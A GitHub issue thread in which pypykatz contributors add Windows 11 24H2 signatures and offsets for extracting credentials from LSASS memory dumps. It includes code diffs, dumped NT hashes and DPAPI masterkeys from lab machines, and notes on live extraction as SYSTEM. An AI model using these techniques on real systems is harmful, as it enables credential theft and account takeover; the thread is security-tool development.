pypykatz
pypykatz copied to clipboard
skelsec
Win11 24H2 Signature Missing
Pypykatz doens't contain the signatures for Win11 24H2 yet. I tried to implement it but I haven't managed yet. If anybody is better at reverse engineering, this is my progress so far:
template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f\x84\x68'
template.first_entry_offset = 46
template.offset2 = -4
This might be completely wrong though.
I attached lsasrv.dll from Win11 24H2.
Seems like a pretty complex task for someone like me who doesn't fully understand how this tool works. At a high level I think the 24H2 build number needs to be included for these template checks. I tinkered with it some but now I am getting a kerberos exception. The signature and offset for the kerberos template should be fine so I'm guessing it's a problem with the structs. The diff below shows the changes I made to find what I think is the right signature and offset for the msv and wdigest templates.
git diff
diff --git a/pypykatz/commons/common.py b/pypykatz/commons/common.py
index 986c0ff..e726b27 100644
--- a/pypykatz/commons/common.py
+++ b/pypykatz/commons/common.py
@@ -362,6 +362,7 @@ class WindowsBuild(enum.Enum):
WIN_10_20H2 = 19042
WIN_11_2022 = 20348
WIN_11_2023 = 22621
+ WIN_11_2024 = 26100
class WindowsMinBuild(enum.Enum):
WIN_XP = 2500
@@ -372,6 +373,7 @@ class WindowsMinBuild(enum.Enum):
WIN_BLUE = 9400
WIN_10 = 9800
WIN_11 = 22000
+ WIN_11_24H2 = 26100
def hexdump( src, length=16, sep='.', start = 0):
diff --git a/pypykatz/lsadecryptor/packages/kerberos/templates.py b/pypykatz/lsadecryptor/packages/kerberos/templates.py
index 320b8aa..4485d90 100644
--- a/pypykatz/lsadecryptor/packages/kerberos/templates.py
+++ b/pypykatz/lsadecryptor/packages/kerberos/templates.py
@@ -101,7 +101,16 @@ class KerberosTemplate(PackageTemplate):
template.hash_password_struct = KERB_HASHPASSWORD_6_1607
template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
- elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2022.value:
+ elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
+ template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
+ template.first_entry_offset = 6
+ template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
+ template.kerberos_ticket_struct = KIWI_KERBEROS_INTERNAL_TICKET_11
+ template.keys_list_struct = KIWI_KERBEROS_KEYS_LIST_6
+ template.hash_password_struct = KERB_HASHPASSWORD_6_1607
+ template.csp_info_struct = KIWI_KERBEROS_CSP_INFOS_10
+
+ elif sysinfo.buildnumber >= WindowsBuild.WIN_11_2024.value:
template.signature = b'\x48\x8b\x18\x48\x8d\x0d'
template.first_entry_offset = 6
template.kerberos_session_struct = KIWI_KERBEROS_LOGON_SESSION_10_1607
diff --git a/pypykatz/lsadecryptor/packages/msv/templates.py b/pypykatz/lsadecryptor/packages/msv/templates.py
index 20600df..e3cb6ba 100644
--- a/pypykatz/lsadecryptor/packages/msv/templates.py
+++ b/pypykatz/lsadecryptor/packages/msv/templates.py
@@ -137,10 +137,15 @@ class MsvTemplate(PackageTemplate):
template.first_entry_offset = 24
template.offset2 = -4
- else:
+ elif WindowsBuild.WIN_11_2023.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2024.value:
template.signature = b'\x45\x89\x37\x4c\x8b\xf7\x8b\xf3\x45\x85\xc0\x0f'
template.first_entry_offset = 27
template.offset2 = -4
+
+ else:
+ template.signature = b'\x4c\x8b\xfe\x48\x85\xf6\x0f'
+ template.first_entry_offset = 52
+ template.offset2 = -4
elif sysinfo.architecture == KatzSystemArchitecture.X86:
if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
diff --git a/pypykatz/lsadecryptor/packages/wdigest/templates.py b/pypykatz/lsadecryptor/packages/wdigest/templates.py
index 150f5f1..f53cb3b 100644
--- a/pypykatz/lsadecryptor/packages/wdigest/templates.py
+++ b/pypykatz/lsadecryptor/packages/wdigest/templates.py
@@ -41,11 +41,17 @@ class WdigestTemplate(PackageTemplate):
template.primary_offset = 48
template.list_entry = PWdigestListEntry
- elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11.value:
+ elif WindowsMinBuild.WIN_11.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_11_24H2.value:
template.signature = b'\x48\x3b\xd8\x74'
template.first_entry_offset = -4
template.primary_offset = 48
template.list_entry = PWdigestListEntry
+
+ elif sysinfo.buildnumber >= WindowsMinBuild.WIN_11_24H2.value:
+ template.signature = b'\x48\x3b\xd9\x0f'
+ template.first_entry_offset = -4
+ template.primary_offset = 48
+ template.list_entry = PWdigestListEntry
else:
raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
You are right I didn't include the build number. To test it I put my code in the else condition (no build number match, execute with my signature)
This is the guide I followed to get the signature values. https://www.praetorian.com/blog/inside-mimikatz-part2/
Thanks for the article. Still not 100% sure on calculating the offset. 23 maybe? I'm also getting a peb parsing error. Here's is my current output with the changes I made.
pypykatz lsa minidump ../lsass_win11.dmp
INFO:pypykatz:Parsing file ../lsass_win11.dmp
ERROR:root:PEB parsing error!
Traceback (most recent call last):
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 86, in _parse
self.__parse_peb()
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpfile.py", line 235, in __parse_peb
self.peb = PEB.from_minidump(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/structures/peb.py", line 85, in from_minidump
buff_reader.move(minidumpfile.threads.threads[0].Teb + PEB_OFFSETS[offset_index]["peb"])
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 136, in move
self._select_segment(address)
File "/home/kali/.local/share/pipx/venvs/pypykatz/lib/python3.12/site-packages/minidump/minidumpreader.py", line 104, in _select_segment
raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)
Exception: Memory address 0x00000060 is not in process memory space
FILE: ======== ../lsass_win11.dmp =======
== Orphaned credentials ==
== WDIGEST [887d6]==
username Administrator
domainname JUICY
password None
password (hex)
== WDIGEST [14332]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [142e5]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e4]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d8a3]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [d908]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== WDIGEST [3e7]==
username WKSTN2$
domainname JUICY
password None
password (hex)
== DPAPI [887d6]==
luid 559062
key_guid 9536a4de-f4ab-454a-8605-45c30ea579ea
masterkey 8e8a281bbd7d1f6063b8f2b6cc1e0fe4b427162acaad48565c757159419078e63afec2bc47b9ab536600aa7f852f23ac02fd39c8a864b58294891dacc9b7042a
sha1_masterkey f9d9a897d4501d268008cd519f8db403be976a6e
== DPAPI [3e7]==
luid 999
key_guid 896fd8e5-88d1-4328-bc25-8b7c2b58ae3b
masterkey 0fc77e1e7956dc9a54a5eeffdde3cee1574734d8150abaf58b1a82a2a90ce0e2604f27a2499a77a75f29e26fcf8586ccbe915ad74ba19063fc8285c312d35aa1
sha1_masterkey 7a1edd5c4501ef9ae7278c7654b4bcff337d859b
== DPAPI [3e7]==
luid 999
key_guid 67c2715a-9448-4e8f-a378-692bd18b7ee1
masterkey b66f15ed9b4b62c38cc9a407fce7034643b376ab60a9a4eccfb33d09094c07e02efc139517d59e4e7d9991135f0509b5721ae9308d4a9e9905567a507e930863
sha1_masterkey 55d12300aa2028b8db413f9881332e73b12210e7
== DPAPI [3e7]==
luid 999
key_guid 98c6d1f2-8891-4b1c-be2c-36a968a3b4ea
masterkey a8ed2aae4bd435a265f86a6de3bbd75df90ddcd616710b3a6039f6203c67c00e74dcfb0bd3169b0305b17ca3bab0aebf8a64e9cb350b60cb8506c4a0be72d04d
sha1_masterkey 701d9b5ef41de502fb6baac0d064ab92c2db7595
== Errors ==
kerberos_exception_please_report TWVtb3J5IGFkZHJlc3MgMHgwMDAwMDAwMiBpcyBub3QgaW4gcHJvY2VzcyBtZW1vcnkgc3BhY2UNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L3B5cHlrYXR6LnB5IiwgbGluZSAzNzAsIGluIHN0YXJ0CiAgICBzZWxmLmdldF9rZXJiZXJvcyh3aXRoX3RpY2tldHMpCg0KICBGaWxlICIvaG9tZS9rYWxpLy5sb2NhbC9zaGFyZS9waXB4L3ZlbnZzL3B5cHlrYXR6L2xpYi9weXRob24zLjEyL3NpdGUtcGFja2FnZXMvcHlweWthdHovcHlweWthdHoucHkiLCBsaW5lIDMyNSwgaW4gZ2V0X2tlcmJlcm9zCiAgICBkZWMuc3RhcnQoKQoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L2xzYWRlY3J5cHRvci9wYWNrYWdlcy9rZXJiZXJvcy9kZWNyeXB0b3IucHkiLCBsaW5lIDExMywgaW4gc3RhcnQKICAgIHNlbGYucHJvY2Vzc19zZXNzaW9uKGtlcmJlcm9zX2xvZ29uX3Nlc3Npb24pCg0KICBGaWxlICIvaG9tZS9rYWxpLy5sb2NhbC9zaGFyZS9waXB4L3ZlbnZzL3B5cHlrYXR6L2xpYi9weXRob24zLjEyL3NpdGUtcGFja2FnZXMvcHlweWthdHovbHNhZGVjcnlwdG9yL3BhY2thZ2VzL2tlcmJlcm9zL2RlY3J5cHRvci5weSIsIGxpbmUgMTI3LCBpbiBwcm9jZXNzX3Nlc3Npb24KICAgIHNlbGYuY3VycmVudF9jcmVkLmRvbWFpbm5hbWUgPSBrZXJiZXJvc19sb2dvbl9zZXNzaW9uLmNyZWRlbnRpYWxzLkRvbWFpbmUucmVhZF9zdHJpbmcoc2VsZi5yZWFkZXIpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL3B5cHlrYXR6L2NvbW1vbnMvd2luX2RhdGF0eXBlcy5weSIsIGxpbmUgNTUsIGluIHJlYWRfc3RyaW5nCiAgICByZWFkZXIubW92ZShzZWxmLkJ1ZmZlcikKDQogIEZpbGUgIi9ob21lL2thbGkvLmxvY2FsL3NoYXJlL3BpcHgvdmVudnMvcHlweWthdHovbGliL3B5dGhvbjMuMTIvc2l0ZS1wYWNrYWdlcy9taW5pZHVtcC9taW5pZHVtcHJlYWRlci5weSIsIGxpbmUgMTM2LCBpbiBtb3ZlCiAgICBzZWxmLl9zZWxlY3Rfc2VnbWVudChhZGRyZXNzKQoNCiAgRmlsZSAiL2hvbWUva2FsaS8ubG9jYWwvc2hhcmUvcGlweC92ZW52cy9weXB5a2F0ei9saWIvcHl0aG9uMy4xMi9zaXRlLXBhY2thZ2VzL21pbmlkdW1wL21pbmlkdW1wcmVhZGVyLnB5IiwgbGluZSAxMDQsIGluIF9zZWxlY3Rfc2VnbWVudAogICAgcmFpc2UgRXhjZXB0aW9uKCdNZW1vcnkgYWRkcmVzcyAweCUwOHggaXMgbm90IGluIHByb2Nlc3MgbWVtb3J5IHNwYWNlJyAlIHJlcXVlc3RlZF9wb3NpdGlvbikK
As far as I understand the first offset should be the offset between the start of the signature and LogonSessionList. So basically a way for the tool to find the pointer to LogonSessionList. I determined this to be 46.
With the second off set I am not 100% sure, but I think it is the offset to LogonSessionList. I calculated -4 here.
Well, I am also not 100% sure my signature is correct.
Here you go. PW=infected
Create with taskmgr.exe
> systeminfo
Host Name: WIN11
OS Name: Microsoft Windows 11 Enterprise Evaluation
OS Version: 10.0.26100 N/A Build 26100
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: N/A
Registered Organization: N/A
Product ID: 00329-20000-00001-AA381
Original Install Date: 2/21/2025, 10:14:22 AM
System Boot Time: 2/21/2025, 1:41:56 PM
System Manufacturer: innotek GmbH
System Model: VirtualBox
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 116 Stepping 1 AuthenticAMD ~3294 Mhz
BIOS Version: innotek GmbH VirtualBox, 12/1/2006
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Total Physical Memory: 8,174 MB
Available Physical Memory: 4,275 MB
Virtual Memory: Max Size: 10,094 MB
Virtual Memory: Available: 6,784 MB
Virtual Memory: In Use: 3,310 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\WIN11
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB5042098
[02]: KB5048779
[03]: KB5050575
[04]: KB5043080
[05]: KB5043113
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Desktop Adapter
Connection Name: Ethernet
DHCP Enabled: Yes
DHCP Server: 10.0.2.2
IP address(es)
[01]: 10.0.2.15
[02]: fe80::7ba0:6aed:4bd:909
[03]: fd00::c191:288d:beb:3d3a
[04]: fd00::e8c3:941:2eac:4943
Virtualization-based security: Status: Not enabled
App Control for Business policy: Enforced
App Control for Business user mode policy: Audit
Security Features Enabled:
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Was this your card?
== LogonSession ==
authentication_id 322002 (4e9d2)
session_id 1
username magnify
domainname WIN11
logon_server WIN11
logon_time 2025-02-21T11:42:29.403870+00:00
sid S-1-5-21-800810350-130866625-3627431900-1004
luid 322002
== MSV ==
Username: magnify
Domain: WIN11
LM: NA
NT: 382878d2f9d3591fe851c21b5e794dfd
SHA1: 564a506572937f8c8358d7db8af47f97b55f8961
DPAPI: 564a506572937f8c8358d7db8af47f97b55f8961
Yes this is the correct one! I don't think there should be credentials in Wdigest. But I can try later this weekend to put something there.
the more data the merrier. What happened is that MS modified the layout of WLsaEnumerateLogonSession so it's now not just a simple ptr retrieval to get to the start of the LogonSessionList.
Had this issue reported a few months ago to me by @jeffmcjunkin but had little time to finish up the code. Now with 2 whole minidumps I am 60% certain on the new way to parse this version.
@mgrottenthaler may I ask for another dump of the same machine but after restart?
Okay two more dumps. One after a restart and for the second one I set UseLogonCredential to one and did various logins (RDP, runas, smb) with different users. So I think there should be data in wdigest.
lsass_after_restart_2.zip lsass_wdigest_2.zip
Sorry for the zip files containing 7z, but I had to get creative to bypass the filesize limit. PW infected again
Amazing, thank you so much! I just tried it and yes indeed it works with an lsass dump. I also tried to do a dump on my live system, but here I got an error. To be honest I have never used pypykatz live before, as I find it way more convenient to do an lsass dump and later analyze it.
But just as a heads up: this didn't work. I executed the powershell with psexec64.exe -s -i powershell.exe (as system and with debug privilege, PPL and virtualization based security turned off)
== Errors ==
msv_exception_please_report b2JqZWN0IG9mIHR5cGUgJ05vbmVUeXBlJyBoYXMgbm8gbGVuKCkNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpccHlweWthdHoucHkiLCBsaW5lIDM2MywgaW4gc3RhcnQKICAgIHNlbGYuZ2V0X2xvZ29uY3JlZHMoKQogICAgfn5+fn5+fn5+fn5+fn5+fn5+fl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxweXB5a2F0ei5weSIsIGxpbmUgMjUxLCBpbiBnZXRfbG9nb25jcmVkcwogICAgbG9nb25jcmVkX2RlY3J5cHRvci5zdGFydCgpCiAgICB+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+Xl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlc1xtc3ZcZGVjcnlwdG9yLnB5IiwgbGluZSA0OTMsIGluIHN0YXJ0CiAgICBzZWxmLndhbGtfbGlzdChlbnRyeV9wdHIsIHNlbGYuYWRkX2VudHJ5KQogICAgfn5+fn5+fn5+fn5+fn5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlX2NvbW1vbnMucHkiLCBsaW5lIDE4OSwgaW4gd2Fsa19saXN0CiAgICBjYWxsYmFjayhlbnRyeSkKICAgIH5+fn5+fn5+Xl5eXl5eXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VzXG1zdlxkZWNyeXB0b3IucHkiLCBsaW5lIDM1MCwgaW4gYWRkX2VudHJ5CiAgICBzZWxmLndhbGtfbGlzdChlbnRyeS5DcmVkZW50aWFsc19saXN0X3B0ciwgc2VsZi5hZGRfY3JlZGVudGlhbHMpCiAgICB+fn5+fn5+fn5+fn5+fl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZV9jb21tb25zLnB5IiwgbGluZSAxODksIGluIHdhbGtfbGlzdAogICAgY2FsbGJhY2soZW50cnkpCiAgICB+fn5+fn5+fl5eXl5eXl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlc1xtc3ZcZGVjcnlwdG9yLnB5IiwgbGluZSAzNjAsIGluIGFkZF9jcmVkZW50aWFscwogICAgc2VsZi53YWxrX2xpc3QoCiAgICB+fn5+fn5+fn5+fn5+fl4KICAgIAlwcmltYXJ5X2NyZWRlbnRpYWxzX2xpc3RfZW50cnkuUHJpbWFyeUNyZWRlbnRpYWxzX3B0ciwKICAgICBeXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl4KICAgIAlzZWxmLmFkZF9wcmltYXJ5X2NyZWRlbnRpYWxzCiAgICAgXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgogICAgKQogICAgXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VfY29tbW9ucy5weSIsIGxpbmUgMTg5LCBpbiB3YWxrX2xpc3QKICAgIGNhbGxiYWNrKGVudHJ5KQogICAgfn5+fn5+fn5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcbXN2XGRlY3J5cHRvci5weSIsIGxpbmUgNDI1LCBpbiBhZGRfcHJpbWFyeV9jcmVkZW50aWFscwogICAgc3RydWN0X3JlYWRlciA9IEdlbmVyaWNSZWFkZXIoZGVjX2RhdGEsIHNlbGYuc3lzaW5mby5hcmNoaXRlY3R1cmUpCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxjb21tb25zXGNvbW1vbi5weSIsIGxpbmUgMjYsIGluIF9faW5pdF9fCiAgICBzZWxmLmVuZF9hZGRyZXNzID0gbGVuKGRhdGEpCiAgICAgICAgICAgICAgICAgICAgICAgfn5+Xl5eXl5eCg==
dpapi_exception_please_report b2JqZWN0IHN1cHBvcnRpbmcgdGhlIGJ1ZmZlciBBUEkgcmVxdWlyZWQNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpccHlweWthdHoucHkiLCBsaW5lIDM5OCwgaW4gc3RhcnQKICAgIHNlbGYuZ2V0X2RwYXBpKCkKICAgIH5+fn5+fn5+fn5+fn5+Xl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XHB5cHlrYXR6LnB5IiwgbGluZSAzMjQsIGluIGdldF9kcGFwaQogICAgZGVjLnN0YXJ0KCkKICAgIH5+fn5+fn5+fl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcZHBhcGlcZGVjcnlwdG9yLnB5IiwgbGluZSA3NiwgaW4gc3RhcnQKICAgIHNlbGYud2Fsa19saXN0KGVudHJ5X3B0ciwgc2VsZi5hZGRfZW50cnkpCiAgICB+fn5+fn5+fn5+fn5+fl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VfY29tbW9ucy5weSIsIGxpbmUgMTg5LCBpbiB3YWxrX2xpc3QKICAgIGNhbGxiYWNrKGVudHJ5KQogICAgfn5+fn5+fn5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcZHBhcGlcZGVjcnlwdG9yLnB5IiwgbGluZSA1OCwgaW4gYWRkX2VudHJ5CiAgICBzaGFfbWFzdGVya2V5ID0gaGFzaGxpYi5zaGExKGRlY19tYXN0ZXJrZXkpLmhleGRpZ2VzdCgpCiAgICAgICAgICAgICAgICAgICAgfn5+fn5+fn5+fn5+Xl5eXl5eXl5eXl5eXl5eCg==
mainly a couple questions:
- What tools do you use to find/get the information?
- Are there any documents/books explaining how to do it? I read the Mimi..PtH paper, i need better a better explanation. Thanx and keep up the great work!
Amazing, thank you so much! I just tried it and yes indeed it works with an lsass dump. I also tried to do a dump on my live system, but here I got an error. To be honest I have never used pypykatz live before, as I find it way more convenient to do an lsass dump and later analyze it.
But just as a heads up: this didn't work. I executed the powershell with
psexec64.exe -s -i powershell.exe(as system and with debug privilege, PPL and virtualization based security turned off)== Errors == msv_exception_please_report b2JqZWN0IG9mIHR5cGUgJ05vbmVUeXBlJyBoYXMgbm8gbGVuKCkNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpccHlweWthdHoucHkiLCBsaW5lIDM2MywgaW4gc3RhcnQKICAgIHNlbGYuZ2V0X2xvZ29uY3JlZHMoKQogICAgfn5+fn5+fn5+fn5+fn5+fn5+fl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxweXB5a2F0ei5weSIsIGxpbmUgMjUxLCBpbiBnZXRfbG9nb25jcmVkcwogICAgbG9nb25jcmVkX2RlY3J5cHRvci5zdGFydCgpCiAgICB+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+Xl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlc1xtc3ZcZGVjcnlwdG9yLnB5IiwgbGluZSA0OTMsIGluIHN0YXJ0CiAgICBzZWxmLndhbGtfbGlzdChlbnRyeV9wdHIsIHNlbGYuYWRkX2VudHJ5KQogICAgfn5+fn5+fn5+fn5+fn5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlX2NvbW1vbnMucHkiLCBsaW5lIDE4OSwgaW4gd2Fsa19saXN0CiAgICBjYWxsYmFjayhlbnRyeSkKICAgIH5+fn5+fn5+Xl5eXl5eXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VzXG1zdlxkZWNyeXB0b3IucHkiLCBsaW5lIDM1MCwgaW4gYWRkX2VudHJ5CiAgICBzZWxmLndhbGtfbGlzdChlbnRyeS5DcmVkZW50aWFsc19saXN0X3B0ciwgc2VsZi5hZGRfY3JlZGVudGlhbHMpCiAgICB+fn5+fn5+fn5+fn5+fl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZV9jb21tb25zLnB5IiwgbGluZSAxODksIGluIHdhbGtfbGlzdAogICAgY2FsbGJhY2soZW50cnkpCiAgICB+fn5+fn5+fl5eXl5eXl4KDQogIEZpbGUgIkM6XFVzZXJzXGhpZ2hwcml2XERvd25sb2Fkc1xweXB5a2F0ei1tYWluXHB5cHlrYXR6XGxzYWRlY3J5cHRvclxwYWNrYWdlc1xtc3ZcZGVjcnlwdG9yLnB5IiwgbGluZSAzNjAsIGluIGFkZF9jcmVkZW50aWFscwogICAgc2VsZi53YWxrX2xpc3QoCiAgICB+fn5+fn5+fn5+fn5+fl4KICAgIAlwcmltYXJ5X2NyZWRlbnRpYWxzX2xpc3RfZW50cnkuUHJpbWFyeUNyZWRlbnRpYWxzX3B0ciwKICAgICBeXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl4KICAgIAlzZWxmLmFkZF9wcmltYXJ5X2NyZWRlbnRpYWxzCiAgICAgXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXl5eXgogICAgKQogICAgXgoNCiAgRmlsZSAiQzpcVXNlcnNcaGlnaHByaXZcRG93bmxvYWRzXHB5cHlrYXR6LW1haW5ccHlweWthdHpcbHNhZGVjcnlwdG9yXHBhY2thZ2VfY29tbW9ucy5weSIsIGxpbmUgMTg5LCBpbiB3YWxrX2xpc3QKICAgIGNhbGxiYWNrKGVudHJ5KQogICAgfn5+fn5+fn5eXl5eXl5eCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxsc2FkZWNyeXB0b3JccGFja2FnZXNcbXN2XGRlY3J5cHRvci5weSIsIGxpbmUgNDI1LCBpbiBhZGRfcHJpbWFyeV9jcmVkZW50aWFscwogICAgc3RydWN0X3JlYWRlciA9IEdlbmVyaWNSZWFkZXIoZGVjX2RhdGEsIHNlbGYuc3lzaW5mby5hcmNoaXRlY3R1cmUpCg0KICBGaWxlICJDOlxVc2Vyc1xoaWdocHJpdlxEb3dubG9hZHNccHlweWthdHotbWFpblxweXB5a2F0elxjb21tb25zXGNvbW1vbi5weSIsIGxpbmUgMjYsIGluIF9faW5pdF9fCiAgICBzZWxmLmVuZF9hZGRyZXNzID0gbGVuKGRhdGEpCiAgICAgICAgICAgICAgICAgICAgICAgfn5+Xl5eXl5eCg== dpapi_exception_please_report 